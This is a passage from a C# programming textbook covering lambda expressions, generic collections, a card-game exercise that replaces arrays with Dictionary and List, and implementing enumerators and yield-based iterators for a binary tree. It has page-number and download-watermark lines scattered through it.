omit the parentheses that surround the parameter. Finally, in many cases, you
can actually omit the type of the parameters because the compiler can infer
this information from the context from which the lambda expression is
invoked. A simplified form of the Find statement shown previously looks
like this (which is much easier to read and understand):
Click here to view code image
Person match = personnel.Find(p => p.ID == 3);
The forms of lambda expressions
Lambda expressions are very powerful constructs, and you will encounter
them with increasing frequency as you delve deeper into C# programming.
The expressions themselves can take some subtly different forms. Lambda
expressions were originally part of a mathematical notation called the lambda
calculus, which provides a notation for describing functions. (You can think
of a function as a method that returns a value.) Although the C# language has
extended the syntax and semantics of the lambda calculus in its
implementation of lambda expressions, many of the original principles still
apply. Here are some examples showing the different forms of lambda
expressions available in C#:
Click here to view code image
x => x * x // A simple expression that returns the square of its
parameter
// The type of parameter x is inferred from the context.
x => { return x * x ; } // Semantically the same as the preceding
// expression, but using a C# statement block
as
// a body rather than a simple expression
Download from finelybook [email protected]
627
(int x) => x / 2 // A simple expression that returns the value of the
// parameter divided by 2
// The type of parameter x is stated explicitly.
() => folder.StopFolding(0) // Calling a method
// The expression takes no parameters.
// The expression might or might not
// return a value.
(x, y) => { x++; return x / y; } // Multiple parameters; the compiler
// infers the parameter types.
// The parameter x is passed by
value, so
// the effect of the ++ operation is
// local to the expression.
(ref int x, int y) => { x++; return x / y; } // Multiple parameters
// with explicit types
// Parameter x is passed
by
// reference, so the
effect of
// the ++ operation is
permanent.
To summarize, here are some features of lambda expressions of which
you should be aware:
If a lambda expression takes parameters, you specify them in the
parentheses to the left of the => operator. You can omit the types of
parameters, and the C# compiler will infer their types from the context
of the lambda expression. You can pass parameters by reference (by
using the ref keyword) if you want the lambda expression to be able to
change its values other than locally, but this is not recommended.
Lambda expressions can return values, but the return type must match
that of the corresponding delegate.
The body of a lambda expression can be a simple expression or a block
of C# code made up of multiple statements, method calls, variable
definitions, and other code items.
Variables defined in a lambda expression method go out of scope when
the method finishes.
A lambda expression can access and modify all variables outside the
lambda expression that are in scope when the lambda expression is
Download from finelybook [email protected]
628
defined. Be very careful with this feature!
Lambda expressions and anonymous methods
Lambda expressions were added to the C# language in version 3.0. C#
version 2.0 introduced anonymous methods, which can perform a
similar task but are not as flexible. Anonymous methods were added
primarily so that you can define delegates without having to create a
named method; you simply provide the definition of the method body in
place of the method name, like this:
Click here to view code image
this.stopMachinery += delegate { folder.StopFolding(0); };
You can also pass an anonymous method as a parameter in place of a
delegate, like this:
Click here to view code image
control.Add(delegate { folder.StopFolding(0); } );
Notice that whenever you introduce an anonymous method, you
must prefix it with the delegate keyword. Also, any parameters needed
are specified in parentheses following the delegate keyword, as
illustrated in the following example:
Click here to view code image
control.Add(delegate(int param1, string param2)
{ /* code that uses param1 and param2 */ ... });
Lambda expressions provide a more succinct and natural syntax than
anonymous methods, and they pervade many of the more advanced
aspects of C#, as you will see throughout the subsequent chapters in this
book. Generally speaking, you should use lambda expressions rather
than anonymous methods in your code.
Comparing arrays and collections
Download from finelybook [email protected]
629
Here’s a summary of the important differences between arrays and
collections:
An array instance has a fixed size and cannot grow or shrink. A
collection can dynamically resize itself as required.
An array can have more than one dimension. A collection is linear.
However, the items in a collection can be collections themselves, so
you can imitate a multidimensional array as a collection of collections.
You store and retrieve an item in an array by using an index. Not all
collections support this notion. For example, to store an item in a
List<T> collection, you use the Add or Insert method, and to retrieve
an item, you use the Find method.
Many of the collection classes provide a ToArray method that creates
and populates an array containing the items in the collection. The items
are copied to the array and are not removed from the collection.
Additionally, these collections provide constructors that can populate a
collection directly from an array.
Using collection classes to play cards
In the next exercise, you will convert the card game developed in Chapter 10
to use collections rather than arrays.
Use collections to implement a card game
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the Cards solution, which is located in the \Microsoft
Press\VCSBS\Chapter 18\Cards folder in your Documents folder.
This project contains an updated version of the project from Chapter 10
that deals hands of cards by using arrays. The PlayingCard class is
modified to expose the value and suit of a card as read-only properties.
3. Display the Pack.cs file in the Code and Text Editor window. Add the
following using directive to the top of the file:
using System.Collections.Generic;
4. In the Pack class, change the definition of the cardPack two-
Download from finelybook [email protected]
630
dimensional array to a Dictionary<Suit, List<PlayingCard>> object, as
shown here in bold:
Click here to view code image
class Pack
{
...
private Dictionary<Suit, List<PlayingCard>> cardPack;
...
}
The original application used a two-dimensional array for representing a
pack of cards. This code replaces the array with a Dictionary, where the
key specifies the suit and the value is a list of cards in that suit.
5. Locate the Pack constructor. Modify the first statement in this
constructor to instantiate the cardPack variable as a new Dictionary
collection rather than as an array, as shown here in bold:
Click here to view code image
public Pack()
{
this.cardPack = new Dictionary<Suit, List<PlayingCard>>
(NumSuits);
...
}
Although a Dictionary collection will resize itself automatically as items
are added, if the collection is unlikely to change in size, you can specify
an initial size when you instantiate it. This helps to optimize the memory
allocation (although the Dictionary collection can still grow if this size
is exceeded). In this case, the Dictionary collection will contain a
collection of four lists (one list for each suit), so it is allocated space for
four items (NumSuits is a constant with the value 4).
6. In the outer for loop, declare a List<PlayingCard> collection object
called cardsInSuit that is big enough to hold the number of cards in each
suit (use the CardsPerSuit constant), as follows in bold:
Click here to view code image
public Pack()
{
this.cardPack = new Dictionary<Suit, List<PlayingCard>>
(NumSuits);
Download from finelybook [email protected]
631
for (Suit = Suit.Clubs; suit <= Suit.Spades; suit++)
{
List<PlayingCard> cardsInSuit = new List<PlayingCard>
(CardsPerSuit);
for (Value value = Value.Two; value <= Value.Ace;
value++)
{
...
}
}
}
7. Change the code in the inner for loop to add new PlayingCard objects to
this collection rather than to the array, as shown in bold in the following
code:
Click here to view code image
for (Suit suit = Suit.Clubs; suit <= Suit.Spades; suit++)
{
List<PlayingCard> cardsInSuit = new List<PlayingCard>
(CardsPerSuit);
for (Value value = Value.Two; value <= Value.Ace; value++)
{
cardsInSuit.Add(new PlayingCard(suit, value));
}
}
8. After the inner for loop, add the List object to the cardPack Dictionary
collection, specifying the value of the suit variable as the key to this
item:
Click here to view code image
for (Suit suit = Suit.Clubs; suit <= Suit.Spades; suit++)
{
List<PlayingCard> cardsInSuit = new List<PlayingCard>
(CardsPerSuit);
for (Value value = Value.Two; value <= Value.Ace; value++)
{
cardsInSuit.Add(new PlayingCard(suit, value));
}
this.cardPack.Add(suit, cardsInSuit);
}
9. Find the DealCardFromPack method.
This method picks a card at random from the pack, removes the card
from the pack, and returns this card. The logic for selecting the card
Download from finelybook [email protected]
632
does not require any changes, but the statements at the end of the
method that retrieve the card from the array must be updated to use the
Dictionary collection instead. Additionally, the code that removes the
card from the array (it has now been dealt) must be modified; you need
to search for the card in the list and then remove it from the list. To
locate the card, use the Find method and specify a predicate that finds a
card with the matching value. The parameter to the predicate should be a
PlayingCard object (the list contains PlayingCard items).
The updated statements occur after the closing brace of the second while
loop, as shown in bold in the following code:
Click here to view code image
public PlayingCard DealCardFromPack()
{
Suit suit = (Suit)randomCardSelector.Next(NumSuits);
while (this.IsSuitEmpty(suit))
{
suit = (Suit)randomCardSelector.Next(NumSuits);
}
Value value = (Value)randomCardSelector.Next(CardsPerSuit);
while (this.IsCardAlreadyDealt(suit, value))
{
value = (Value)randomCardSelector.Next(CardsPerSuit);
}
List<PlayingCard> cardsInSuit = this.cardPack[suit];
PlayingCard card = cardsInSuit.Find(c => c.CardValue ==
value);
cardsInSuit.Remove(card);
return card;
}
10. Locate the IsCardAlreadyDealt method.
This method determines whether a card has already been dealt by
checking whether the corresponding element in the array has been set to
null. You need to modify this method to determine whether a card with
the specified value is present in the list for the suit in the cardPack
Dictionary collection.
To determine whether an item exists in a List<T> collection, you use the
Exists method. This method is similar to Find in as much as it takes a
predicate as its argument. The predicate is passed each item from the
collection in turn, and it should return true if the item matches some
Download from finelybook [email protected]
633
specified criteria, and false otherwise. In this case, the List<T>
collection holds PlayingCard objects, and the criteria for the Exists
predicate should return true if it is passed a PlayingCard item with a suit
and value that matches the parameters passed to the IsCardAlreadyDealt
method.
Update the method, as shown in the following example in bold:
Click here to view code image
private bool IsCardAlreadyDealt(Suit suit, Value value)
{
List<PlayingCard> cardsInSuit = this.cardPack[suit];
return (!cardsInSuit.Exists(c => c.CardSuit == suit &&
c.CardValue == value));
}
11. Display the Hand.cs file in the Code and Text Editor window. Add the
following using directive to the list at the top of the file:
using System.Collections.Generic;
12. The Hand class currently uses an array called cards to hold the playing
cards for the hand. Modify the definition of the cards variable to be a
List<PlayingCard> collection, as shown here in bold:
Click here to view code image
class Hand
{
public const int HandSize = 13;
private List<PlayingCard> cards = new List<PlayingCard>
(HandSize);
...
}
13. Find the AddCardToHand method.
This method currently checks to see whether the hand is full; if it is not,
it adds the card provided as the parameter to the cards array at the index
specified by the playingCardCount variable.
Update this method to use the Add method of the List<PlayingCard>
collection instead.
This change also removes the need to explicitly keep track of how many
cards the collection holds because you can use the Count property of the
Download from finelybook [email protected]
634
cards collection instead. Therefore, remove the playingCardCount
variable from the class and modify the if statement that checks whether
the hand is full to reference the Count property of the cards collection.
The completed method should look like this, with the changes
highlighted in bold:
Click here to view code image
public void AddCardToHand(PlayingCard cardDealt)
{
if (this.cards.Count >= HandSize)
{
throw new ArgumentException("Too many cards");
}
this.cards.Add(cardDealt);
}
14. On the Debug menu, click Start Debugging to build and run the
application.
15. When the Card Game form appears, click Deal.
Note The Deal button is located on the command bar. You may
need to expand the command bar to reveal the button.
Verify that the cards are dealt and that the populated hands appear as
before. Click Deal again to generate another random set of hands.
The following image shows the application running:
Download from finelybook [email protected]
635
16. Return to Visual Studio 2017 and stop debugging.
Summary
In this chapter, you learned how to use some of the common collection
classes to store and access data. In particular, you learned how to use generic
collection classes to create type-safe collections. You also learned how to
create lambda expressions to search for specific items within collections.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 19, “Enumerating collections.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Create a
Use the constructor for the collection class. For example:
Download from finelybook [email protected]
636
new
collection
Click here to view code image
List<PlayingCard> cards = new List<PlayingCard>();
Add an
item to a
collection
Use the Add or Insert methods (as appropriate) for lists, hash
sets, and dictionary-oriented collections. Use the Enqueue
method for Queue<T> collections. Use the Push method for
Stack<T> collections. For example:
Click here to view code image
HashSet<string> employees = new HashSet<string>();
employees.Add("John");
...
LinkedList<int> data = new LinkedList<int>();
data.AddFirst(101);
...
Stack<int> numbers = new Stack<int>(); numbers.Push(99);
Remove an
item from a
collection
Use the Remove method for lists, hash sets, and dictionary-
oriented collections. Use the Dequeue method for Queue<T>
collections. Use the Pop method for Stack<T> collections. For
example:
Click here to view code image
HashSet<string> employees = new HashSet<string>();
employees.Remove("John");
...
LinkedList<int> data = new LinkedList<int>();
data.Remove(101);
...
Stack<int> numbers = new Stack<int>();
...
int item = numbers.Pop();
Find the
number of
elements in
a collection
Use the Count property. For example:
Click here to view code image
List<PlayingCard> cards = new List<PlayingCard>();
...
int noOfCards = cards.Count;
Locate an
item in a
collection
For dictionary-oriented collections, use array notation. For
lists, use the Find methods. For example:
Click here to view code image
Dictionary<string, int> ages = new Dictionary<string,
Download from finelybook [email protected]
637
int>();
ages.Add("John", 47);
int johnsAge = ages["John"];
...
List<Person> personnel = new List<Person>();
Person match = personnel.Find(p => p.ID == 3);
Note: The Stack<T>, Queue<T>, and hash set collection
classes do not support searching, although you can test for
membership of an item in a hash set by using the Contains
method.
Iterate
through the
elements of
a collection
Use a for statement or a foreach statement. For example:
Click here to view code image
LinkedList<int> numbers = new LinkedList<int>();
...
for (LinkedListNode<int> node = numbers.First; node !=
null;
node = node.Next)
{
int number = node.Value;
Console.WriteLine(number);
}
...
foreach (int number in numbers)
{
Console.WriteLine(number);
}
Download from finelybook [email protected]
638
CHAPTER 19
Enumerating collections
After completing this chapter, you will be able to:
Manually define an enumerator that you can use to iterate over the
elements in a collection.
Implement an enumerator automatically by creating an iterator.
Provide additional iterators that can step through the elements of a
collection in different sequences.
Chapter 10, “Using arrays,” and Chapter 18, “Using collections,” show how
you work with arrays and collection classes for holding sequences or sets of
data. Chapter 10 also details the foreach statement, which you can use to step
through, or iterate over, the elements in a collection. In these chapters, you
use the foreach statement as a quick and convenient way of accessing the
contents of an array or a collection, but now it is time to learn a little more
about how this statement actually works. This topic becomes important when
you define your own collection classes, and this chapter describes how you
can make collections enumerable.
Enumerating the elements in a collection
Chapter 10 presents an example of using the foreach statement to list the
items in a simple array. The code looks like this:
Click here to view code image
Download from finelybook [email protected]
639
int[] pins = { 9, 3, 7, 2 };
foreach (int pin in pins)
{
Console.WriteLine(pin);
}
The foreach construct provides an elegant mechanism that greatly
simplifies the code you need to write, but it can be exercised only under
certain circumstances—you can use foreach only to step through an
enumerable collection.
But what exactly is an enumerable collection? The quick answer is that it
is a collection that implements the System.Collections.IEnumerable interface.
Note Remember that all arrays in C# are actually instances of the
System.Array class. The System.Array class is a collection class that
implements the IEnumerable interface.
The IEnumerable interface contains a single method called
GetEnumerator:
IEnumerator GetEnumerator();
The GetEnumerator method should return an enumerator object that
implements the System.Collections.IEnumerator interface. The enumerator
object is used for stepping through (enumerating) the elements of the
collection. The IEnumerator interface specifies the following property and
methods:
Click here to view code image
object Current { get; }
bool MoveNext();
void Reset();
Think of an enumerator as a pointer indicating elements in a list. Initially,
the pointer points before the first element. You call the MoveNext method to
move the pointer down to the next (first) item in the list; the MoveNext
method should return true if there actually is another item and false if there
Download from finelybook [email protected]
640
isn’t. You use the Current property to access the item currently pointed to,
and you use the Reset method to return the pointer back to before the first
item in the list. By using the GetEnumerator method of a collection to create
an enumerator, repeatedly calling the MoveNext method, and using the
enumerator to retrieve the value of the Current property, you can move
forward through the elements of a collection one item at a time. This is
exactly what the foreach statement does. So, if you want to create your own
enumerable collection class, you must implement the IEnumerable interface
in your collection class and also provide an implementation of the
IEnumerator interface to be returned by the GetEnumerator method of the
collection class.
Important At first glance, it is easy to confuse the IEnumerable and
IEnumerator interfaces because their names are so similar. Be certain
not to mix them up.
If you are observant, you will have noticed that the Current property of
the IEnumerator interface exhibits non–type-safe behavior in that it returns
an object rather than a specific type. However, you should be pleased to
know that the Microsoft .NET Framework class library also provides the
generic IEnumerator<T> interface, which has a Current property that returns
a T instead. Likewise, there is also an IEnumerable<T> interface containing
a GetEnumerator method that returns an Enumerator<T> object. Both of
these interfaces are defined in the System.Collections.Generic namespace,
and if you are building applications for the .NET Framework version 2.0 or
later, you should make use of these generic interfaces rather than the
nongeneric versions when you define enumerable collections.
Manually implementing an enumerator
In the following exercise, you will define a class that implements the generic
IEnumerator<T> interface and create an enumerator for the binary tree class
that is demonstrated in Chapter 17, “Introducing generics.”
Download from finelybook [email protected]
641
Chapter 17 illustrates how easy it is to traverse a binary tree and display
its contents. You would, therefore, be inclined to think that defining an
enumerator that retrieves each element in a binary tree in the same order
would be a simple matter. Sadly, you would be mistaken. The main problem
is that when defining an enumerator, you need to remember where you are in
the structure so that subsequent calls to the MoveNext method can update the
position appropriately. Recursive algorithms, such as those used when
walking a binary tree, do not lend themselves to maintaining state
information between method calls in an easily accessible manner. For this
reason, you will first preprocess the data in the binary tree into a more
amenable data structure (a queue) and actually enumerate this data structure
instead. Of course, this deviousness is hidden from the user iterating through
the elements of the binary tree!
Create the TreeEnumerator class
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the BinaryTree solution, which is located in the \Microsoft
Press\VCSBS\Chapter 19\ BinaryTree folder in your Documents folder.
This solution contains a working copy of the BinaryTree project you
created in Chapter 17. You will add a new class to this project in which
to implement the enumerator for the BinaryTree class.
3. In Solution Explorer, click the BinaryTree project. On the Project menu,
click Add Class to open the Add New Item - BinaryTree dialog box. In
the middle pane, select the Class template, type TreeEnumerator.cs in
the Name box, and then click Add.
4. The TreeEnumerator class will generate an enumerator for a
Tree<TItem> object. To ensure that the class is type safe, you must
provide a type parameter and implement the IEnumerator<T> interface.
Also, the type parameter must be a valid type for the Tree<TItem>
object that the class enumerates, so it must be constrained to implement
the IComparable<TItem> interface (the BinaryTree class requires that
items in the tree provide a means to be compared for sorting purposes).
In the Code and Text Editor window displaying the TreeEnumerator.cs
file, modify the definition of the TreeEnumerator class to satisfy these
requirements, as shown in bold in the following example:
Download from finelybook [email protected]
642
Click here to view code image
class TreeEnumerator<TItem> : IEnumerator<TItem> where TItem :
IComparable<TItem>
{
}
5. Add the following three private variables, shown in the following code
in bold to the TreeEnumerator<TItem> class:
Click here to view code image
class TreeEnumerator<TItem> : IEnumerator<TItem> where TItem :
IComparable<TItem>
{
private Tree<TItem> currentData = null;
private TItem currentItem = default(TItem);
private Queue<TItem> enumData = null;
}
The currentData variable will be used to hold a reference to the tree
being enumerated, and the currentItem variable will hold the value
returned by the Current property. You will populate the enumData
queue with the values extracted from the nodes in the tree, and the
MoveNext method will return each item from this queue in turn. The
default keyword is explained in the section “Initializing a variable
defined with a type parameter” later in this chapter.
6. Add a constructor that takes a Tree<TItem> parameter called data to the
TreeEnumerator <TItem> class. In the body of the constructor, add the
statement shown in bold that initializes the currentData variable to data:
Click here to view code image
class TreeEnumerator<TItem> : IEnumerator<TItem> where TItem :
IComparable<TItem>
{
...
public TreeEnumerator(Tree<TItem> data)
{
this.currentData = data;
}
}
7. Add the following private method shown in bold, called populate, to the
TreeEnumerator<TItem> class, immediately after the constructor:
Download from finelybook [email protected]
643
Click here to view code image
class TreeEnumerator<TItem> : IEnumerator<TItem> where TItem :
IComparable<TItem>
{
...
public TreeEnumerator(Tree<TItem> data)
{
this.currentData = data;
}
private void populate(Queue<TItem> enumQueue, Tree<TItem>
tree)
{
if (tree.LeftTree != null)
{
populate(enumQueue, tree.LeftTree);
}
enumQueue.Enqueue(tree.NodeData);
if (tree.RightTree != null)
{
populate(enumQueue, tree.RightTree);
}
}
}
This method walks the binary tree, adding the data it contains to the
queue. The algorithm used is similar to that used by the WalkTree
method in the Tree<TItem> class, which is described in Chapter 17. The
main difference is that rather than appending NodeData values to a
string, the method stores these values in the queue.
8. Return to the definition of the TreeEnumerator<TItem> class. In the
class declaration, hover over the text IEnumerator<TItem>. On the
drop-down context menu that appears (with a lightbulb icon), click
Implement Interface Explicitly.
This action generates stubs for the methods in the IEnumerator<TItem>
interface and the IEnumerator interface and adds them to the end of the
class. It also generates the Dispose method for the IDisposable interface.
Download from finelybook [email protected]
644
Note The IEnumerator<TItem> interface inherits from the
IEnumerator and IDisposable interfaces, which is why their
methods also appear. In fact, the only item that belongs to the
IEnumerator<TItem> interface is the generic Current property.
The MoveNext and Reset methods belong to the nongeneric
IEnumerator interface. Chapter 14, “Using garbage collection and
resource management,” describes the IDisposable interface.
9. Examine the code that has been generated.
The bodies of the properties and methods contain a default
implementation that simply throws a NotImplementedException
exception. You will replace this code in the following steps.
10. Update the body of the MoveNext method and replace the throw new
NotImplementedException() statement with the code shown in
bold here:
Click here to view code image
bool IEnumerator.MoveNext()
{
if (this.enumData == null)
{
this.enumData = new Queue<TItem>();
populate(this.enumData, this.currentData);
}
if (this.enumData.Count > 0)
{
this.currentItem = this.enumData.Dequeue();
return true;
}
return false;
}
The purpose of the MoveNext method of an enumerator is actually
twofold. The first time it is called, it should initialize the data used by
the enumerator and advance to the first piece of data to be returned.
(Before MoveNext being called for the first time, the value returned by
the Current property is undefined and should result in an exception.) In
this case, the initialization process consists of instantiating the queue and
Download from finelybook [email protected]
645
then calling the populate method to fill the queue with data extracted
from the tree.
Subsequent calls to the MoveNext method should just move through data
items until there are no more left, dequeuing items until the queue is
empty, as in this example. It is important to keep in mind that MoveNext
does not actually return data items—that is the purpose of the Current
property. All MoveNext does is update the internal state in the
enumerator (that is, the value of the currentItem variable is set to the
data item extracted from the queue) for use by the Current property,
returning true if there is a next value and false otherwise.
11. Modify the definition of the get accessor of the generic Current property
and replace the expression-bodied member with the following code
shown in bold:
Click here to view code image
TItem IEnumerator<TItem>.Current
{
get
{
if (this.enumData == null)
{
throw new InvalidOperationException("Use MoveNext
before calling Current");
}
return this.currentItem;
}
}
Important Be sure to add the code to the correct implementation
of the Current property. Leave the nongeneric version,
System.Collections.IEnumerator.Current, with its default
implementation that throws a NotImplementedException exception.
The Current property examines the enumData variable to ensure that
MoveNext has been called. (This variable will be null before the first call
to MoveNext.) If this is not the case, the property throws an
Download from finelybook [email protected]
646
InvalidOperationException—this is the conventional mechanism used
by .NET Framework applications to indicate that an operation cannot be
performed in the current state. If MoveNext has been called beforehand,
it will have updated the currentItem variable, so all the Current property
needs to do is return the value in this variable.
12. Locate the IDisposable.Dispose method. Comment out the throw new
NotImplementedException(); statement as shown in bold in the code that
follows. The enumerator does not use any resources that require explicit
disposal, so this method does not need to do anything. It must still be
present, however. For more information about the Dispose method, refer
to Chapter 14.
Click here to view code image
void IDisposable.Dispose()
{
// throw new NotImplementedException();
}
13. Build the solution, and correct errors if any are reported.
Initializing a variable defined with a type parameter
You should have noticed that the statement that defines and initializes
the currentItem variable uses the default keyword:
Click here to view code image
private TItem currentItem = default(TItem);
The currentItem variable is defined by using the type parameter
TItem. When the program is written and compiled, the actual type that
will be substituted for TItem might not be known; this issue is resolved
only when the code is executed. This makes it difficult to specify how
the variable should be initialized. The temptation is to set it to null.
However, if the type substituted for TItem is a value type, this is an
illegal assignment. (You cannot set value types to null, only reference
types.) Similarly, if you set it to 0 with the expectation that the type will
be numeric, this will be illegal if the type used is actually a reference
type. There are other possibilities as well; TItem could be a boolean, for
Download from finelybook [email protected]
647
example. The default keyword solves this problem. The value used to
initialize the variable will be determined when the statement is
executed. If TItem is a reference type, default(TItem) returns null; if
TItem is numeric, default(TItem) returns 0; if TItem is a boolean,
default(TItem) returns false. If TItem is a struct, the individual fields in
the struct are initialized in the same way. (Reference fields are set to
null, numeric fields are set to 0, and boolean fields are set to false.)
Implementing the IEnumerable interface
In the following exercise, you will modify the binary tree class to implement
the IEnumerable<T> interface. The GetEnumerator method will return a
TreeEnumerator<TItem> object.
Implement the IEnumerable<TItem> interface in the Tree<TItem> class
1. In Solution Explorer, double-click the file Tree.cs to display the
Tree<TItem> class in the Code and Text Editor window.
2. Modify the definition of the Tree<TItem> class so that it implements the
IEnumerable<TItem> interface, as shown in bold in the following code:
Click here to view code image
public class Tree<TItem> : IEnumerable<TItem> where TItem :
IComparable<TItem>
Notice that constraints are always placed at the end of the class
definition.
3. Hover over the IEnumerable<TItem> interface in the class definition.
On the drop-down context menu that appears, click Implement Interface
Explicitly.
This action generates implementations of the
IEnumerable<TItem>.GetEnumerator and IEnumerable.GetEnumerator
methods and adds them to the class. The nongeneric IEnumerable
interface method is implemented because the generic
IEnumerable<TItem> interface inherits from IEnumerable.
Download from finelybook [email protected]
648
4. Locate the generic IEnumerable<TItem>.GetEnumerator method near
the end of the class. Modify the body of the GetEnumerator() method,
replacing the existing throw statement, as shown in bold in the following
example:
Click here to view code image
IEnumerator<TItem> IEnumerable<TItem>.GetEnumerator()
{
return new TreeEnumerator<TItem>(this);
}
The purpose of the GetEnumerator method is to construct an enumerator
object for iterating through the collection. In this case, all you need to do
is build a new TreeEnumerator<TItem> object by using the data in the
tree.
5. Build the solution. Correct any errors that are reported, and rebuild the
solution if necessary.
You will now test the modified Tree<TItem> class by using a foreach
statement to iterate through a binary tree and display its contents.
Test the enumerator
1. In Solution Explorer, right-click the BinaryTree solution, point to Add,
and then click New Project.
2. Add a new project by using the Console App (.NET Framework)
template. Name the project EnumeratorTest, set the location to
\Microsoft Press\VCSBS\Chapter 19\BinaryTree in your Documents
folder, and then click OK.
3. Right-click the EnumeratorTest project in Solution Explorer, and then
click Set As StartUp Project.
4. On the Project menu, click Add Reference. In the Reference Manager -
EnumeratorTest dialog box, in the left pane, expand the Projects node
and click Solution. In the middle pane, select the BinaryTree project,
and then click OK.
The BinaryTree assembly appears in the list of references for the
EnumeratorTest project in Solution Explorer.
Download from finelybook [email protected]
649
5. In the Code and Text Editor window displaying the Program class, add
the following using directive to the list at the top of the file:
using BinaryTree;
6. Add the statements shown below in bold to the Main method. These
statements create and populate a binary tree of integers:
Click here to view code image
static void Main(string[] args)
{
Tree<int> tree1 = new Tree<int>(10);
tree1.Insert(5);
tree1.Insert(11);
tree1.Insert(5);
tree1.Insert(-12);
tree1.Insert(15);
tree1.Insert(0);
tree1.Insert(14);
tree1.Insert(-8);
tree1.Insert(10);
}
7. Add a foreach statement, as follows in bold, that enumerates the
contents of the tree and displays the results:
Click here to view code image
static void Main(string[] args)
{
...
foreach (int item in tree1)
{
Console.WriteLine(item);
}
}
8. On the Debug menu, click Start Without Debugging.
The program runs and displays the values in the following sequence:
–12, –8, 0, 5, 5, 10, 10, 11, 14, 15
9. Press Enter to return to Visual Studio 2017.
Implementing an enumerator by using an iterator
Download from finelybook [email protected]
650
As you can see, the process of making a collection enumerable can become
complex and is potentially prone to error. To make life easier, C# provides
iterators that can automate much of this process.
An iterator is a block of code that yields an ordered sequence of values.
An iterator is not actually a member of an enumerable class; rather, it
specifies the sequence that an enumerator should use for returning its values.
In other words, an iterator is just a description of the enumeration sequence
that the C# compiler can use for creating its own enumerator. This concept
requires a little thought to understand properly, so consider the following
simple example.
A simple iterator
The following BasicCollection<T> class illustrates the principles of
implementing an iterator. The class uses a List<T> object for holding data
and provides the FillList method for populating this list. Notice also that the
BasicCollection<T> class implements the IEnumerable<T> interface. The
GetEnumerator method is implemented by using an iterator:
Click here to view code image
using System;
using System.Collections.Generic;
using System.Collections;
class BasicCollection<T> : IEnumerable<T>
{
private List<T> data = new List<T>();
public void FillList(params T [] items)
{
foreach (var datum in items)
{
data.Add(datum);
}
}
IEnumerator<T> IEnumerable<T>.GetEnumerator()
{
foreach (var datum in data)
{
yield return datum;
}
}
IEnumerator IEnumerable.GetEnumerator()
Download from finelybook [email protected]
651
{
// Not implemented in this example
throw new NotImplementedException();
}
}
The GetEnumerator method appears to be straightforward, but it warrants
closer examination. The first thing to notice is that it doesn’t appear to return
an IEnumerator<T> type. Instead, it loops through the items in the data
array, returning each item in turn. The key point is the use of the yield
keyword. The yield keyword indicates the value that should be returned by
each iteration. If it helps, you can think of the yield statement as calling a
temporary halt to the method, passing back a value to the caller. When the
caller needs the next value, the GetEnumerator method continues at the point
at which it left off, looping around and then yielding the next value.
Eventually, the data is exhausted, the loop finishes, and the GetEnumerator
method terminates. At this point, the iteration is complete.
Remember that this is not a normal method in the usual sense. The code in
the GetEnumerator method defines an iterator. The compiler uses this code
to generate an implementation of the IEnumerator<T> class containing a
Current method and a MoveNext method. This implementation exactly
matches the functionality specified by the GetEnumerator method. You don’t
actually get to see this generated code (unless you decompile the assembly
containing the compiled code), but that is a small price to pay for the
convenience and reduction in code that you need to write. You can invoke the
enumerator generated by the iterator in the usual manner, as shown in the
following block of code, which displays the words in the first line of the
poem “Jabberwocky” by Lewis Carroll:
Click here to view code image
BasicCollection<string> bc = new BasicCollection<string>();
bc.FillList("Twas", "brillig", "and", "the", "slithy", "toves");
foreach (string word in bc)
{
Console.WriteLine(word);
}
This code simply outputs the contents of the bc object in this order:
Twas, brillig, and, the, slithy, toves
Download from finelybook [email protected]
652
If you want to provide alternative iteration mechanisms to present the data
in a different sequence, you can implement additional properties that
implement the IEnumerable interface and that use an iterator for returning
data. For example, the Reverse property of the BasicCollection<T> class,
shown here, emits the data in the list in reverse order:
Click here to view code image
class BasicCollection<T> : IEnumerable<T>
{
...
public IEnumerable<T> Reverse
{
get
{
for (int i = data.Count - 1; i >= 0; i--)
{
yield return data[i];
}
}
}
}
You can invoke this property as follows:
Click here to view code image
BasicCollection<string> bc = new BasicCollection<string>();
bc.FillList("Twas", "brillig", "and", "the", "slithy", "toves");
foreach (string word in bc.Reverse)
{
Console.WriteLine(word);
}
This code outputs the contents of the bc object in reverse order:
toves, slithy, the, and, brillig, Twas
Defining an enumerator for the Tree<TItem> class by
using an iterator
In the next exercise, you will implement the enumerator for the Tree<TItem>
class by using an iterator. Unlike in the preceding set of exercises, which
required the data in the tree to be preprocessed into a queue by the MoveNext
method, here you can define an iterator that traverses the tree by using the
more naturally recursive mechanism, similar to the WalkTree method
Download from finelybook [email protected]
653
discussed in Chapter 17.
Add an enumerator to the Tree<TItem> class
1. Using Visual Studio 2017, open the BinaryTree solution, located in the
\Microsoft Press\VCSBS\Chapter 19\IteratorBinaryTree folder in your
Documents folder. This solution contains another copy of the
BinaryTree project you created in Chapter 17.
2. Open the file Tree.cs in the Code and Text Editor window. Modify the
definition of the Tree<TItem> class so that it implements the
IEnumerable<TItem> interface, as shown here in bold:
Click here to view code image
public class Tree<TItem> : IEnumerable<TItem> where TItem :
IComparable<TItem>
{
...
}
3. Hover over the IEnumerable<TItem> interface in the class definition.
On the drop-down context menu that appears, click Implement Interface
Explicitly to add the IEnumerable<TItem>. GetEnumerator and
IEnumerable.GetEnumerator methods to the end of the class.
4. Locate the generic IEnumerable<TItem>.GetEnumerator method.
Replace the contents of the GetEnumerator method as shown in bold in
the following code:
Click here to view code image
IEnumerator<TItem> IEnumerable<TItem>.GetEnumerator()
{
if (this.LeftTree != null)
{
foreach (TItem item in this.LeftTree)
{
yield return item;
}
}
yield return this.NodeData;
if (this.RightTree != null)
{
foreach (TItem item in this.RightTree)
Download from finelybook [email protected]
654
{
yield return item;
}
}
}
It might not be obvious at first glance, but this code follows the same
recursive algorithm that you used in Chapter 17 for listing the contents
of a binary tree. If LeftTree is not empty, the first foreach statement
implicitly calls the GetEnumerator method (which you are currently
defining) over it. This process continues until a node is found that has no
left subtree. At this point, the value in the NodeData property is yielded,
and the right subtree is examined in the same way. When the right
subtree is exhausted, the process unwinds to the parent node, outputting
the parent’s NodeData property and examining the right subtree of the
parent. This course of action continues until the entire tree has been
enumerated and all the nodes have been output.
Test the new enumerator
1. In Solution Explorer, right-click the BinaryTree solution, point to Add,
and then click Existing Project. In the Add Existing Project dialog box,
move to the folder \Microsoft Press\VCSBS\Chapter
